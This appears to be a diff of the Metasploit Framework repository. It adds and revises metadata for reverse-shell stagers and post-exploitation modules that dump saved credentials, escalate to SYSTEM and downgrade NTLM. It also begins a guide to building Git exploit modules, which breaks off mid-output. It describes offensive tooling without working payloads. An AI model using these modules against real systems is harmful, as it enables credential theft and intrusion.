+      "bwatters-r7",
+      "OJ Reeves"
+    ],
+    "description": "Custom shellcode stage. Tunnel communication over HTTP (Windows x64 winhttp)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/reverse_winhttp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/reverse_winhttp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/custom/reverse_winhttps": {
+    "name": "Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)",
+    "fullname": "payload/windows/x64/custom/reverse_winhttps",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "OJ Reeves"
+    ],
+    "description": "Custom shellcode stage. Tunnel communication over HTTPS (Windows x64 winhttp)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/reverse_winhttps.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/reverse_winhttps",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "payload_windows/x64/encrypted_shell/reverse_tcp": {
    "name": "Windows Command Shell, Encrypted Reverse TCP Stager",
    "fullname": "payload/windows/x64/encrypted_shell/reverse_tcp",
@@ -201406,6 +205455,56 @@
    ],
    "needs_cleanup": null
  },
+  "post_linux/gather/mimipenguin": {
+    "name": "MimiPenguin",
+    "fullname": "post/linux/gather/mimipenguin",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2018-05-23",
+    "type": "post",
+    "author": [
+      "huntergregal",
+      "bcoles <bcoles@gmail.com>",
+      "Shelby Pace"
+    ],
+    "description": "This searches process memory for needles that indicate\n          where cleartext passwords may be located. If any needles\n          are discovered in the target process memory, collected\n          strings in adjacent memory will be hashed and compared\n          with password hashes found in `/etc/shadow`.",
+    "references": [
+      "URL-https://github.com/huntergregal/mimipenguin",
+      "URL-https://bugs.launchpad.net/ubuntu/+source/gnome-keyring/+bug/1772919",
+      "URL-https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1717490",
+      "CVE-2018-20781"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64, aarch64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-09-08 08:48:33 +0000",
+    "path": "/modules/post/linux/gather/mimipenguin.rb",
+    "is_install_path": true,
+    "ref_name": "linux/gather/mimipenguin",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null
+  },
  "post_linux/gather/mount_cifs_creds": {
    "name": "Linux Gather Saved mount.cifs/mount.smbfs Credentials",
    "fullname": "post/linux/gather/mount_cifs_creds",
@@ -205908,7 +210007,7 @@
    "needs_cleanup": null
  },
  "post_windows/escalate/getsystem": {
-    "name": "Windows Escalate Get System via Administrator",
+    "name": "Windows Escalation",
    "fullname": "post/windows/escalate/getsystem",
    "aliases": [

@@ -205919,7 +210018,7 @@
    "author": [
      "hdm <x@hdm.io>"
    ],
-    "description": "This module uses the builtin 'getsystem' command to escalate\n          the current session to the SYSTEM account from an administrator\n          user account.",
+    "description": "This module uses the `getsystem` command to escalate the current session to the SYSTEM account using various\n          techniques.",
    "references": [

    ],
@@ -205929,7 +210028,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-06-23 18:43:18 +0000",
+    "mod_time": "2022-09-16 14:53:45 +0000",
    "path": "/modules/post/windows/escalate/getsystem.rb",
    "is_install_path": true,
    "ref_name": "windows/escalate/getsystem",
@@ -206275,7 +210374,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-09-23 17:41:20 +0000",
    "path": "/modules/post/windows/gather/bitlocker_fvek.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/bitlocker_fvek",
@@ -206813,7 +210912,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-08-20 12:16:26 +0000",
+    "mod_time": "2022-09-23 17:41:20 +0000",
    "path": "/modules/post/windows/gather/credentials/domain_hashdump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/domain_hashdump",
@@ -207320,7 +211419,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-09-23 17:41:20 +0000",
    "path": "/modules/post/windows/gather/credentials/gpp.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/gpp",
@@ -207973,6 +212072,51 @@
    ],
    "needs_cleanup": null
  },
+  "post_windows/gather/credentials/moba_xterm": {
+    "name": "Windows Gather MobaXterm Passwords",
+    "fullname": "post/windows/gather/credentials/moba_xterm",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Kali-Team <kali-team@qq.com>"
+    ],
+    "description": "This module will determine if MobaXterm is installed on the target system and, if it is, it will try to\n          dump all saved session information from the target. The passwords for these saved sessions will then be decrypted\n          where possible, using the decryption information that HyperSine reverse engineered.",
+    "references": [
+      "URL-https://blog.kali-team.cn/Metasploit-MobaXterm-0b976b993c87401598be4caab8cbe0cd"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-10-06 01:39:28 +0000",
+    "path": "/modules/post/windows/gather/credentials/moba_xterm.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/moba_xterm",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null
+  },
  "post_windows/gather/credentials/mremote": {
    "name": "Windows Gather mRemote Saved Password Extraction",
    "fullname": "post/windows/gather/credentials/mremote",
@@ -208501,6 +212645,51 @@
    ],
    "needs_cleanup": null
  },
+  "post_windows/gather/credentials/redis_desktop_manager": {
+    "name": "RedisDesktopManager credential gatherer",
+    "fullname": "post/windows/gather/credentials/redis_desktop_manager",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Kali-Team"
+    ],
+    "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n          Further details can be found in the module documentation.\n          This is a module that searches for RedisDesktopManager credentials on a windows remote host.",
+    "references": [
+      "URL-https://blog.kali-team.cn/Metasploit-PackRat-RedisDesktopManager-42dc7ab063f040d182da0f1fc16db74e"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-09-14 17:03:42 +0000",
+    "path": "/modules/post/windows/gather/credentials/redis_desktop_manager.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/redis_desktop_manager",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null
+  },
  "post_windows/gather/credentials/safari": {
    "name": "Safari credential gatherer",
    "fullname": "post/windows/gather/credentials/safari",
@@ -209049,6 +213238,51 @@
    ],
    "needs_cleanup": null
  },
+  "post_windows/gather/credentials/thycotic_secretserver_dump": {
+    "name": "Delinea Thycotic Secret Server Dump",
+    "fullname": "post/windows/gather/credentials/thycotic_secretserver_dump",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2022-08-15",
+    "type": "post",
+    "author": [
+      "npm <npm@cesium137.io>"
+    ],
+    "description": "This module exports and decrypts Secret Server credentials to a CSV file;\n          it is intended as a post-exploitation module for Windows hosts with Delinea/Thycotic\n          Secret Server installed. Master Encryption Key (MEK) and associated IV values are\n          decrypted from encryption.config using a static key baked into the software. The\n          module also supports parameter recovery for encryption configs configured with\n          Windows DPAPI.",
+    "references": [
+      "URL-https://github.com/denandz/SecretServerSecretStealer"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-09-29 13:58:54 +0000",
+    "path": "/modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/thycotic_secretserver_dump",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null
+  },
  "post_windows/gather/credentials/tlen": {
    "name": "Tlen credential gatherer",
    "fullname": "post/windows/gather/credentials/tlen",
@@ -210359,7 +214593,7 @@
    "author": [
      "Joshua Abraham <jabra@rapid7.com>"
    ],
-    "description": "This module identifies the primary domain via the registry. The registry value used is:\n          HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\DCName.",
+    "description": "This module identifies the primary Active Directory domain name\n          and domain controller.",
    "references": [

    ],
@@ -210369,7 +214603,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-09-08 13:35:22 +0000",
    "path": "/modules/post/windows/gather/enum_domain.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_domain",
@@ -210377,9 +214611,20 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
-      "meterpreter"
+      "meterpreter",
+      "shell",
+      "powershell"
    ],
    "needs_cleanup": null
  },
@@ -210396,7 +214641,7 @@
      "Carlos Perez <carlos_perez@darkoperator.com>",
      "Stephen Haywood <haywoodsb@gmail.com>"
    ],
-    "description": "This module extracts user accounts from specified group\n          and stores the results in the loot. It will also verify if session\n          account is in the group. Data is stored in loot in a format that\n          is compatible with the token_hunter plugin. This module should be\n          run over as session with domain credentials.",
+    "description": "This module extracts user accounts from the specified domain group\n          and stores the results in the loot. It will also verify if session\n          account is in the group. Data is stored in loot in a format that\n          is compatible with the token_hunter plugin. This module must be\n          run on a session running as a domain user.",
    "references": [

    ],
@@ -210406,7 +214651,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-09-22 17:05:19 +0000",
    "path": "/modules/post/windows/gather/enum_domain_group_users.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_domain_group_users",
@@ -210414,6 +214659,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
      "meterpreter"
@@ -210432,7 +214686,7 @@
    "author": [
      "Carlos Perez <carlos_perez@darkoperator.com>"
    ],
-    "description": "This module will enumerate tokens present on a system that are part of the\n          domain the target host is part of, will also enumerate users in the local\n          Administrators, Users and Backup Operator groups to identify Domain members.\n          Processes will be also enumerated and checked if they are running under a\n          Domain account, on all checks the accounts, processes and tokens will be\n          checked if they are part of the Domain Admin group of the domain the machine\n          is a member of.",
+    "description": "This module enumerates domain account tokens, processes running under\n          domain accounts, and domain users in the local Administrators, Users\n          and Backup Operator groups.",
    "references": [

    ],
@@ -210442,7 +214696,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-08-20 12:16:26 +0000",
+    "mod_time": "2022-09-10 13:54:39 +0000",
    "path": "/modules/post/windows/gather/enum_domain_tokens.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_domain_tokens",
@@ -210450,6 +214704,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
      "meterpreter"
@@ -210779,7 +215042,7 @@
    "author": [
      "Brandon Perry <bperry.volatile@gmail.com>"
    ],
-    "description": "This module will enumerate the OS license key",
+    "description": "This module will enumerate Microsoft product license keys.",
    "references": [

    ],
@@ -210789,7 +215052,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-24 16:06:55 +0000",
+    "mod_time": "2022-08-21 16:00:27 +0000",
    "path": "/modules/post/windows/gather/enum_ms_product_keys.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_ms_product_keys",
@@ -210797,9 +215060,20 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
-      "meterpreter"
+      "meterpreter",
+      "powershell",
+      "shell"
    ],
    "needs_cleanup": null
  },
@@ -210888,7 +215162,7 @@
      "zeroSteiner <zeroSteiner@gmail.com>",
      "mubix <mubix@hak5.org>"
    ],
-    "description": "This module will attempt to enumerate which patches are applied to a windows system\n          based on the result of the WMI query: SELECT HotFixID, InstalledOn FROM Win32_QuickFixEngineering.",
+    "description": "This module enumerates patches applied to a Windows system using the\n          WMI query: SELECT HotFixID, InstalledOn FROM Win32_QuickFixEngineering.",
    "references": [
      "URL-http://msdn.microsoft.com/en-us/library/aa394391(v=vs.85).aspx"
    ],
@@ -210898,7 +215172,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-09-23 17:41:20 +0000",
    "path": "/modules/post/windows/gather/enum_patches.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_patches",
@@ -210906,6 +215180,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
      "meterpreter"
@@ -211081,7 +215364,7 @@
      "Keith Faber",
      "Kx499"
    ],
-    "description": "This module will query the system for services and display name and\n        configuration info for each returned service. It allows you to\n        optionally search the credentials, path, or start type for a string\n        and only return the results that match. These query operations are\n        cumulative and if no query strings are specified, it just returns all\n        services.  NOTE: If the script hangs, windows firewall is most likely\n        on and you did not migrate to a safe process (explorer.exe for\n        example).",
+    "description": "This module will query the system for services and display name and\n          configuration info for each returned service. It allows you to\n          optionally search the credentials, path, or start type for a string\n          and only return the results that match. These query operations are\n          cumulative and if no query strings are specified, it just returns all\n          services.  NOTE: If the script hangs, windows firewall is most likely\n          on and you did not migrate to a safe process (explorer.exe for\n          example).",
    "references": [

    ],
@@ -211091,7 +215374,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2022-09-09 17:27:19 +0000",
    "path": "/modules/post/windows/gather/enum_services.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_services",
@@ -211099,9 +215382,20 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
-      "meterpreter"
+      "meterpreter",
+      "powershell",
+      "shell"
    ],
    "needs_cleanup": null
  },
@@ -211127,7 +215421,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-08-31 12:31:09 +0000",
+    "mod_time": "2022-09-02 17:34:32 +0000",
    "path": "/modules/post/windows/gather/enum_shares.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_shares",
@@ -211153,7 +215447,7 @@
    "needs_cleanup": null
  },
  "post_windows/gather/enum_snmp": {
-    "name": "Windows Gather SNMP Settings Enumeration (Registry)",
+    "name": "Windows Gather SNMP Settings",
    "fullname": "post/windows/gather/enum_snmp",
    "aliases": [

@@ -211165,9 +215459,10 @@
      "Carlos Perez <carlos_perez@darkoperator.com>",
      "Tebo <tebo@attackresearch.com>"
    ],
-    "description": "This module will enumerate the SNMP service configuration",
+    "description": "This module will enumerate the SNMP service configuration.",
    "references": [
-
+      "MSB-MS00-096",
+      "URL-https://docs.microsoft.com/en-us/security-updates/securitybulletins/2000/ms00-096"
    ],
    "platform": "Windows",
    "arch": "",
@@ -211175,7 +215470,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2022-09-13 17:45:10 +0000",
    "path": "/modules/post/windows/gather/enum_snmp.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_snmp",
@@ -211183,8 +215478,19 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
+      "shell",
+      "powershell",
      "meterpreter"
    ],
    "needs_cleanup": null
@@ -211237,7 +215543,7 @@
    "author": [
      "Joshua Abraham <jabra@rapid7.com>"
    ],
-    "description": "This module will identify systems that have a Domain Admin (delegation) token\n          on them.  The module will first check if sufficient privileges are present for\n          certain actions, and run getprivs for system.  If you elevated privs to system,\n          the SeAssignPrimaryTokenPrivilege will not be assigned, in that case try\n          migrating to another process that is running as system.  If no sufficient\n          privileges are available, the script will not continue.",
+    "description": "This module enumerates Domain Admin account processes and delegation tokens.\n\n          This module will first check if the session has sufficient privileges\n          to replace process level tokens and adjust process quotas.\n\n          The SeAssignPrimaryTokenPrivilege privilege will not be assigned if\n          the session has been elevated to SYSTEM. In that case try first\n          migrating to another process that is running as SYSTEM.",
    "references": [

    ],
@@ -211247,7 +215553,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-09-22 12:04:24 +0000",
    "path": "/modules/post/windows/gather/enum_tokens.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_tokens",
@@ -211255,6 +215561,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
      "meterpreter"
@@ -211987,17 +216302,19 @@
      "Brandon McCann \"zeknox\" <bmccann@accuvant.com>",
      "Thomas McCarthy \"smilingraccoon\" <smilingraccoon@gmail.com>"
    ],
-    "description": "This module will change a registry value to enable\n        the sending of LM challenge hashes and then initiate a SMB connection to\n        the SMBHOST datastore. If an SMB server is listening, it will receive the\n        NetLM hashes",
+    "description": "This module changes the system LmCompatibilityLevel registry value\n          to enable sending LM challenge hashes and initiates a SMB connection\n          to the host specified in the SMBHOST module option. If an SMB server\n          is listening, it will receive the NetLM hashes for the session user.",
    "references": [
-      "URL-https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks"
+      "URL-https://web.archive.org/web/20210311141729/https://www.optiv.com/explore-optiv-insights/blog/post-exploitation-using-netntlm-downgrade-attacks",
+      "URL-https://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level",
+      "URL-https://support.microsoft.com/en-us/topic/security-guidance-for-ntlmv1-and-lm-network-authentication-da2168b6-4a31-0088-fb03-f081acde6e73"
    ],
-    "platform": "",
+    "platform": "Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-01-28 20:35:57 +0000",
+    "mod_time": "2022-10-01 22:35:11 +0000",
    "path": "/modules/post/windows/gather/netlm_downgrade.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/netlm_downgrade",
@@ -212005,9 +216322,20 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "config-changes"
+      ]
    },
    "session_types": [
-      "meterpreter"
+      "meterpreter",
+      "shell",
+      "powershell"
    ],
    "needs_cleanup": null
  },
@@ -212451,7 +216779,7 @@
    "needs_cleanup": null
  },
  "post_windows/gather/wmic_command": {
-    "name": "Windows Gather Run Specified WMIC Command",
+    "name": "Windows Gather Run WMIC Commands",
    "fullname": "post/windows/gather/wmic_command",
    "aliases": [

@@ -212462,7 +216790,7 @@
    "author": [
      "Carlos Perez <carlos_perez@darkoperator.com>"
    ],
-    "description": "This module will execute a given WMIC command options or read\n        WMIC commands options from a resource file and execute the commands in the\n        specified Meterpreter session.",
+    "description": "This module executes WMIC commands on the specified host.",
    "references": [

    ],
@@ -212472,7 +216800,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-12-23 11:36:38 +0000",
+    "mod_time": "2022-09-23 00:25:13 +0000",
    "path": "/modules/post/windows/gather/wmic_command.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/wmic_command",
@@ -212480,6 +216808,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
      "meterpreter"
@@ -212616,7 +216953,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-08-08 01:40:15 +0000",
    "path": "/modules/post/windows/manage/change_password.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/change_password",
@@ -212997,7 +217334,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-08-08 12:56:52 +0000",
+    "mod_time": "2022-09-23 17:41:20 +0000",
    "path": "/modules/post/windows/manage/forward_pageant.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/forward_pageant",
@@ -213494,7 +217831,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-19 14:54:07 +0000",
+    "mod_time": "2022-10-01 17:54:59 +0000",
    "path": "/modules/post/windows/manage/persistence_exe.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/persistence_exe",
@@ -213506,11 +217843,11 @@
        "crash-safe"
      ],
      "Reliability": [
-        "artifacts-on-disk",
-        "config-changes"
+        "repeatable-session"
      ],
      "SideEffects": [
-        "repeatable-session"
+        "artifacts-on-disk",
+        "config-changes"
      ]
    },
    "session_types": [
@@ -213941,7 +218278,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-09-19 17:31:51 +0000",
    "path": "/modules/post/windows/manage/rollback_defender_signatures.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/rollback_defender_signatures",
@@ -213949,6 +218286,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "service-resource-loss"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
      "meterpreter"
@@ -293,6 +293,15 @@ module Build
        '@scanner',
        '@yieldparam',
        '@yieldreturn',
+        '@compressed',
+        '@content',
+        '@path',
+        '@sha1',
+        '@type',
+        '@git_repo_uri',
+        '@git_addr',
+        '@git_objs',
+        '@refs',
      ]

      # Replace any dangling github usernames, i.e. `@foo` - but not `[@foo](http://...)` or `email@example.com`
@@ -84,6 +84,10 @@ OptSomething.new(option_name, [boolean, description, value, *enums*], aliases: *
 * **conditions** - *optional*, *key-word only* An array of a condition for which the option should be displayed. This
  can be used to hide options when they are irrelevant based on other configurations. See the [Filtering datastore
  options](#Filtering-datastore-options) section for more information.
+* **fallbacks** *optional*, *key-word only* An array of names that will be used as a fallback if the main option name is
+  defined by the user. This is useful in the scenario of wanting specialised option names such as `SMBUser`, but to also
+  support gracefully checking a list of more generic fallbacks option names such as `Username`. This functionality is 
+  currently behind a feature flag, set with `features set datastore_fallbacks true` in msfconsole

 Now let's talk about what classes are available:

@@ -0,0 +1,399 @@
+This page walks through the process of creating an exploit module for vulnerable Git clients.
+
+### Building a Repository
+
+Many of the existing Git exploits in Metasploit rely on being able to host a valid repository that a Git client can successfully clone. So to get started with building an exploit, the contents of the repo need to be decided on first.
+
+Let's say that the repository is something like the following:
+
+```
+space@vm:~/test-repo$ ls -al
+total 20
+drwxrwxr-x  4 space space 4096 Sep 16 14:06 .
+drwxr-x--- 23 space space 4096 Sep 16 14:05 ..
+drwxrwxr-x  2 space space 4096 Sep 16 14:06 dir
+-rw-rw-r--  1 space space   10 Sep 16 14:06 file.txt
+drwxrwxr-x  7 space space 4096 Sep 16 14:06 .git
+space@vm:~/test-repo$ ls -al dir
+total 12
+drwxrwxr-x 2 space space 4096 Sep 16 14:06 .
+drwxrwxr-x 4 space space 4096 Sep 16 14:06 ..
+-rw-rw-r-- 1 space space    5 Sep 16 14:06 test_file.txt
+```
+
+The `.git` directory is the only component of the repository that won't be sent,
+so the repository will consist of the `file.txt`, the `dir` folder, and the `test_file.txt` file that lives within the `dir`  folder. Every file and directory inside the repo is represented as a Git object: File contents are represented as blob objects which get coupled together to form a tree object. Lastly, a commit object is created to hold information about the tree object, including the tree's sha, the author of the commit, a commit message, etc.
+
+There will need to be two tree objects to represent the contents of `dir` and the contents
+of the root of the repository. Starting with the contents of `dir`, a blob object
+needs to be created to represent the contents of `test_file.txt`:
+
+```
+space@vm:~/test-repo$ cat dir/test_file.txt 
+test
+```
+
+The [Git mixin][1] contains the functionality for building a Git object.
+To build a blob object, the `build_blob_object()` class method should be used:
+
+```
+>> contents = "test\n"
+=> "test\n"
+>> blob = Msf::Exploit::Git::GitObject.build_blob_object(contents)
+=> 
+#<Msf::Exploit::Git::GitObject:0x00007fe163c75cd0                                            
+```
+
+The resulting object will contain the object type, its original contents,
+its compressed contents, its sha, and its path (where the commit object will
+be stored client side). Since this will be the only file in the `dir` folder,
+the tree object can be created with `Msf::Exploit::Git::GitObject.build_tree_object()`.
+A tree object is represented differently, holding information about each file contained
+in the directory, such as file permissions, file name, object type, and the file's sha1 hash.
+Because of that, the `build_tree_object()` expects a hash or an array of hashes,
+where each hash looks like the following:
+
+```
+>> tree_entry =
+{
+	mode: '100644',
+	file_name: 'test_file.txt',
+	sha1: blob.sha1
+}
+```
+
+And using that, the tree object can now be created:
+
+```
+>> tree_object = Msf::Exploit::Git::GitObject.build_tree_object(tree_entry)
+=> 
+#<Msf::Exploit::Git::GitObject:0x00007fe161b0cd78
+```
+
+Now that the `dir` folder is represented in Git objects, we can represent the root
+of the repository. That just requires creating a `blob` object for `file.txt`,
+creating a `tree` object representing the top-level directory, and finally a commit object.
+
+Again, a blob object needs to be created to represent the contents of the remaining file:
+
+```
+space@vm:~/test-repo$ cat file.txt
+some text
+```
+
+```
+>> contents = "some text\n"
+=> "some text\n"
+>> file_blob = Msf::Exploit::Git::GitObject.build_blob_object(contents)
+=> 
+#<Msf::Exploit::Git::GitObject:0x00007fe163bf54b8                                              
+...                                                                                            
+```
+
+Then, a new tree object needs to be created to represent the top-level directory,
+which includes `file.txt` and the `dir` folder:
+
+```
+?> entries = [
+?>   {
+?>     mode: '100644',
+?>     file_name: 'file.txt',
+?>     sha1: file_blob.sha1
+?>   },
+?>   {
+?>     mode: '040000',
+?>     file_name: 'dir',
+?>     sha1: tree_object.sha1
+?>   }
+>> ]
+=> [{:mode=>"100644", :file_name=>"file.txt", :sha1=>"b649a9bf89116c581f8329b8ec3c79a86a70...
+>> top_level_obj = Msf::Exploit::Git::GitObject.build_tree_object(entries)
+```
+
+The `build_commit_object()` method takes a hash that expects the sha1 hash for
+the tree created, the sha1 hash for the parent commit if one exists, and optional
+data such as an author name, email address, company name, commit message, etc.
+If the user chooses not to pass in data for the optional data, `Faker` will generate
+random data for them.
+
+```
+>> commit_object = Msf::Exploit::Git::GitObject.build_commit_object(tree_sha1: top_level_obj.sh
+a1)
+=> 
+#<Msf::Exploit::Git::GitObject:0x00007fe1533ac848                                              
+...                                                                                            
+>> commit_object
+=> 
+#<Msf::Exploit::Git::GitObject:0x00007fe1533ac848                                              
+ @compressed=                                                                                  
